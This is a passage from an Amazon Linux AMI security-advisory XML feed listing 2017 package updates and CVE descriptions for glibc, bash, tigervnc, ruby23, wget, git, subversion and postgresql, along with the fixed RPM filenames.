epoch="0" arch="i686"><filename>Packages/libnl3-debuginfo-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3-devel" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-devel-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-3.2.28-4.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2017-877</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-877: medium priority package update for glibc</title><issued date="2017-08-31 15:52:00" /><updated date="2017-08-31 23:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8779:
A stack based buffer overflow vulnerability was found in the catopen() function. An excessively long string passed to the function could cause it to crash or, potentially, execute arbitrary code.
1300312:
CVE-2015-8779 glibc: Unbounded stack allocation in catopen function
CVE-2015-8778:
An integer overflow vulnerability was found in hcreate() and hcreate_r() functions which could result in an out-of-bounds memory access. This could lead to application crash or, potentially, arbitrary code execution.
1300303:
CVE-2015-8778 glibc: Integer overflow in hcreate and hcreate_r
CVE-2015-8777:
It was found that the dynamic loader did not sanitize the LD_POINTER_GUARD environment variable. An attacker could use this flaw to bypass the pointer guarding protection on set-user-ID or set-group-ID programs to execute arbitrary code with the permissions of the user running the application.
1260581:
CVE-2015-8777 glibc: LD_POINTER_GUARD in the environment is not sanitized
CVE-2015-8776:
It was found that out-of-range time values passed to the strftime() function could result in an out-of-bounds memory access. This could lead to application crash or, potentially, information disclosure.
1300299:
CVE-2015-8776 glibc: Segmentation fault caused by passing out-of-range data to strftime()
CVE-2014-9761:
A stack overflow vulnerability was found in nan* functions that could cause applications, which process long strings with the nan function, to crash or, potentially, execute arbitrary code.
1300310:
CVE-2014-9761 glibc: Unbounded stack allocation in nan* functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9761" title="" id="CVE-2014-9761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8776" title="" id="CVE-2015-8776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8777" title="" id="CVE-2015-8777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8778" title="" id="CVE-2015-8778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8779" title="" id="CVE-2015-8779" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-devel" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="196.172.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-196.172.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-196.172.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-878</id><title>Amazon Linux AMI 
2014.03 - ALAS-2017-878: medium priority package update for bash</title><issued date="2017-08-31 15:53:00" /><updated date="2017-08-31 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9401:
A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.
1396383:
CVE-2016-9401 bash: popd controlled free
CVE-2016-7543:
An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances.
1379630:
CVE-2016-7543 bash: Specially crafted SHELLOPTS+PS4 variables allows command substitution
CVE-2016-0634:
An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances.
1377613:
CVE-2016-0634 bash: Arbitrary code execution via malicious hostname
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634" title="" id="CVE-2016-0634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543" title="" id="CVE-2016-7543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9401" title="" id="CVE-2016-9401" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash-debuginfo" version="4.2.46" release="28.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.2.46-28.37.amzn1.x86_64.rpm</filename></package><package name="bash" version="4.2.46" release="28.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.2.46-28.37.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.2.46" release="28.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.2.46-28.37.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.2.46" release="28.37.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.2.46-28.37.amzn1.i686.rpm</filename></package><package name="bash" version="4.2.46" release="28.37.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.2.46-28.37.amzn1.i686.rpm</filename></package><package name="bash-debuginfo" version="4.2.46" release="28.37.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.2.46-28.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-879</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-879: medium priority package update for tigervnc</title><issued date="2017-08-31 15:56:00" /><updated date="2017-08-31 23:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7396:
A memory leak flaw was found in the way TigerVNC handled client connections. A remote unauthenticated attacker could repeatedly send connection requests to the Xvnc server, causing it to consume large amounts of memory resources over time, and ultimately leading to a denial of service due to memory exhaustion.
1438703:
CVE-2017-7396 tigervnc: SecurityServer and ClientServer memory leaks
CVE-2017-7395:
An integer overflow flaw was found in the way TigerVNC handled ClientCutText messages. A remote, authenticated attacker could use this flaw to make Xvnc crash by sending specially crafted ClientCutText messages, resulting in denial of service.
1438701:
CVE-2017-7395 tigervnc: Integer overflow in SMsgReader::readClientCutText
CVE-2017-7394:
A missing input sanitization flaw was found in the way TigerVNC handled credentials. A remote unauthenticated attacker could use this flaw to make Xvnc crash by sending specially crafted usernames, resulting in denial of service.
1438700:
CVE-2017-7394 tigervnc: Server crash via long usernames
CVE-2017-7393:
A double free flaw was found in the way TigerVNC handled ClientFence messages. A remote, authenticated attacker could use this flaw to make Xvnc crash by sending specially crafted ClientFence messages, resulting in denial of service.
1438697:
CVE-2017-7393 tigervnc: Double free via crafted fences
CVE-2017-7392:
A memory leak flaw was found in the way TigerVNC handled termination of VeNCrypt connections. A remote unauthenticated attacker could repeatedly send connection requests to the Xvnc server, causing it to consume large amounts of memory resources over time, and ultimately leading to a denial of service due to memory exhaustion.
1438694:
CVE-2017-7392 tigervnc: SSecurityVeNCrypt memory leak
CVE-2017-5581:
A buffer overflow flaw, leading to memory corruption, was found in TigerVNC viewer. A remote malicious VNC server could use this flaw to crash the client vncviewer process resulting in denial of service.
1415712:
CVE-2017-5581 tigervnc: Buffer overflow in ModifiablePixelBuffer::fillRect
CVE-2016-10207:
A denial of service flaw was found in TigerVNC&#039;s Xvnc server. A remote unauthenticated attacker could use this flaw to make Xvnc crash by terminating the TLS handshake process early.
1418761:
CVE-2016-10207 tigervnc: VNC server can crash when TLS handshake terminates early
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10207" title="" id="CVE-2016-10207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5581" title="" id="CVE-2017-5581" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7392" title="" id="CVE-2017-7392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7393" title="" id="CVE-2017-7393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7394" title="" id="CVE-2017-7394" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7395" title="" id="CVE-2017-7395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7396" title="" id="CVE-2017-7396" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-1.32.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="1.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-1.32.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-1.32.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-880</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-880: medium priority package update for ruby23</title><issued date="2017-08-31 15:57:00" /><updated date="2017-08-31 23:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7798:
The openssl gem for Ruby uses the same initialization vector (IV) in GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for context-dependent attackers to bypass the encryption protection mechanism.
1381526:
CVE-2016-7798 ruby: IV Reuse in GCM Mode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7798" title="" id="CVE-2016-7798" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby23" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby23-doc" version="2.3.4" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.4-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2-1.15.amzn1.noarch.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-irb" version="2.3.4" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.4-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-libs" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package 
name="rubygem23-psych" version="2.1.0" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygems23" version="2.5.2" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.4-1.15.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.4-1.15.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0-1.15.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.4-1.15.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.15.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.4-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-881</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-881: low priority package update for wget</title><issued date="2017-08-31 15:58:00" /><updated date="2017-08-31 23:07:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6508:
A CRLF injection flaw was found in the way wget handled URLs. A remote attacker could use this flaw to inject arbitrary HTTP headers in requests, via CRLF sequences in the host sub-component of a URL, by tricking a user running wget into processing crafted URLs.
1429984:
CVE-2017-6508 wget: CRLF injection in the url_parse function in url.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6508" title="" id="CVE-2017-6508" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget" version="1.18" release="3.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-3.27.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-3.27.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.27.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-3.27.amzn1.i686.rpm</filename></package><package name="wget" version="1.18" release="3.27.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-3.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-882</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-882: important priority package update for git</title><issued date="2017-08-31 16:00:00" /><updated date="2017-08-31 23:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000117:
A shell command injection flaw related to the handling of &quot;ssh&quot; URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a &quot;clone&quot; action on a malicious repository or a legitimate repository containing a malicious commit.
1480386:
CVE-2017-1000117 git: Command injection via malicious ssh URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000117" title="" id="CVE-2017-1000117" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-daemon" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.13.5" release="1.53.amzn1" epoch="0" 
arch="noarch"><filename>Packages/git-hg-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.13.5-1.53.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.13.5-1.53.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.13.5-1.53.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.13.5-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-883</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-883: important priority package update for subversion mod_dav_svn</title><issued date="2017-08-31 16:11:00" /><updated date="2017-08-31 23:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9800:
A shell command injection flaw related to the handling of &quot;svn+ssh&quot; URLs has been discovered in Subversion. An attacker could use this flaw to execute shell commands with the privileges of the user running the Subversion client, for example when performing a &quot;checkout&quot; or &quot;update&quot; action on a malicious repository, or a legitimate repository containing a malicious commit.
1479686:
CVE-2017-9800 subversion: Command injection through clients via malicious svn+ssh URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9800" title="" id="CVE-2017-9800" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.9.7" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.9.7-1.54.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.7" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.9.7-1.54.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.9.7" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.9.7-1.54.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.7" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.9.7-1.54.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package 
name="subversion-libs" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.7" 
release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.7-1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-884</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-884: medium priority package update for postgresql93 postgresql92</title><issued date="2017-08-31 16:20:00" /><updated date="2017-08-31 23:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7547:
An authorization flaw was found in the way PostgreSQL handled access to the pg_user_mappings view on foreign servers. A remote authenticated attacker could potentially use this flaw to retrieve passwords from the user mappings defined by the foreign server owners without actually having the privileges to do so.
1477185:
CVE-2017-7547 postgresql: pg_user_mappings view discloses passwords to users lacking server privileges
CVE-2017-7546:
It was found that authenticating to a PostgreSQL database account with an empty password was possible despite libpq&#039;s refusal to send an empty password. A remote attacker could potentially use this flaw to gain access to database accounts with empty passwords.
1477184:
CVE-2017-7546 postgresql: Empty password accepted in some authentication methods
